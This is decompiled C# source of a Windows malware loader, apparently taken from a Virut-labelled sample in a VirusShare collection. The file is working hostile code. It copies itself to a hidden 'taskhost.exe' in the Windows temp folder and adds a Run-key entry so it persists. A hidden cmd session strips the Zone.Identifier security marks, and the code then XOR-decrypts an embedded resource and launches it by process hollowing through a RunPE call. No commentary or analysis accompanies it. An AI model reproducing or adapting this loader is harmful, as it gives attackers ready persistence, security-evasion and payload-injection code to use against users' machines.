// Decompiled with JetBrains decompiler
// Type: smss.ReadResource
// Assembly: smss, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9DAAF14C-A13E-4FB1-BFB2-3533F8F506E6
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Virut.ac-a8742491b0c24128c984e4272dd39160994413c06121c47fa9bf8ecb333708fd.exe

using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

namespace smss
{
  [StandardModule]
  internal sealed class ReadResource
  {
    private static object _tPath = (object) (Environment.GetEnvironmentVariable("windir") + "\\temp\\taskhost.exe");
    private static object _proc = (object) Process.GetCurrentProcess().MainModule.ModuleName;

    public static void Startup()
    {
      try
      {
        if (!File.Exists(Conversions.ToString(ReadResource._tPath)))
          File.Copy(Conversions.ToString(ReadResource._proc), Conversions.ToString(ReadResource._tPath), true);
        File.SetAttributes(Conversions.ToString(ReadResource._tPath), File.GetAttributes(Conversions.ToString(ReadResource._tPath)) | FileAttributes.Hidden);
        RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
        if (registryKey == null || registryKey.GetValue(Conversions.ToString(ReadResource._tPath)) != null)
          return;
        registryKey.SetValue(Conversions.ToString(ReadResource._tPath), RuntimeHelpers.GetObjectValue(ReadResource._tPath));
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }

    public static void DisableSecurity()
    {
      try
      {
        Process process = new Process();
        ProcessStartInfo processStartInfo1 = new ProcessStartInfo();
        ProcessStartInfo processStartInfo2 = processStartInfo1;
        processStartInfo2.FileName = "cmd";
        processStartInfo2.RedirectStandardInput = true;
        processStartInfo2.RedirectStandardOutput = true;
        processStartInfo2.UseShellExecute = false;
        processStartInfo2.CreateNoWindow = true;
        process.StartInfo = processStartInfo1;
        process.Start();
        using (StreamReader standardOutput = process.StandardOutput)
        {
          using (StreamWriter standardInput = process.StandardInput)
          {
            standardInput.WriteLine(Conversions.ToString(Operators.ConcatenateObject((object) "cd ", ReadResource._tPath)), (object) AppWinStyle.Hide);
            standardInput.WriteLine(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object) "FOR /R %I IN (*", ReadResource._proc), (object) "*) DO > %I:Zone.Identifier ECHO.")), (object) AppWinStyle.Hide);
            standardInput.WriteLine("exit");
            standardInput.Close();
          }
          standardOutput.Close();
        }
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);

    [DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern IntPtr GetModuleHandle([MarshalAs(UnmanagedType.VBByRefStr)] ref string moduleName);

    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern IntPtr LoadResource(IntPtr hModule, IntPtr fr);

    [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
    private static extern int SizeofResource(IntPtr hModule, IntPtr fr);

    [STAThread]
    public static void Main()
    {
      ReadResource.DisableSecurity();
      ReadResource.Startup();
      try
      {
        string moduleName = Process.GetCurrentProcess().MainModule.ModuleName;
        IntPtr moduleHandle = ReadResource.GetModuleHandle(ref moduleName);
        IntPtr resource = ReadResource.FindResource(moduleHandle, "0", "RT_RCDATA");
        IntPtr source = ReadResource.LoadResource(moduleHandle, resource);
        int length = ReadResource.SizeofResource(moduleHandle, resource);
        byte[] numArray = new byte[length - 1 + 1 - 1 + 1];
        Marshal.Copy(source, numArray, 0, length);
        int int32_1 = BitConverter.ToInt32(numArray, Convert.ToInt32(numArray.Length - 4));
        byte[] data = (byte[]) Utils.CopyArray((Array) numArray, (Array) new byte[numArray.Length - 3 + 1 - 1 + 1]);
        Random random = new Random(int32_1);
        byte[] buffer = new byte[data.Length - 1 + 1 - 1 + 1];
        random.NextBytes(buffer);
        int int32_2 = Convert.ToInt32(data.Length - 1);
        for (int index = 0; index <= int32_2; ++index)
          data[index] = Convert.ToByte((byte) ((int) data[index] ^ (int) buffer[index]));
        RunpeClass.RunpeSub(data, Conversions.ToString(ReadResource._proc));
      }
      catch (Exception ex)
      {
        ProjectData.SetProjectError(ex);
        ProjectData.ClearProjectError();
      }
    }
  }
}